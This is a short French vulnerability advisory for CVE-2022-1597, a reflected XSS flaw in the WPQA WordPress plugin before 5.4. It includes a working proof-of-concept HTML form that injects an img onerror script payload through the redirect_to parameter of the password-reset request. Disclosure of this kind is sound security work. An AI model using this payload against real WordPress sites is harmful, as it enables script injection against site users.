
Le plugin, utilisé comme un compagnon pour les thèmes Discy et Himer, ne nettoie ni n'échappe un paramètre dans son formulaire de réinitialisation de mot de passe, ce qui permet de réaliser des attaques de type Cross-Site Scripting réfléchi.
Le plugin, utilisé comme compagnon pour les thèmes Discy et Himer, ne nettoie ni n'échappe un paramètre sur son formulaire de réinitialisation de mot de passe, ce qui permet des attaques de type Cross-Site Scripting Réfléchi (Reflected XSS).
WPQA < 5.4
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="user_mail" value="[email protected]" />
<input type="hidden" name="form_type" value="wpqa_forget" />
<input type="hidden" name="action" value="wpqa_ajax_password_process" />
<input type="hidden" name="redirect_to" value=""><img src=x onerror=alert(document.domain)>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

https://www.youtube.com/watch?v=E2GRtf6prq8
https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597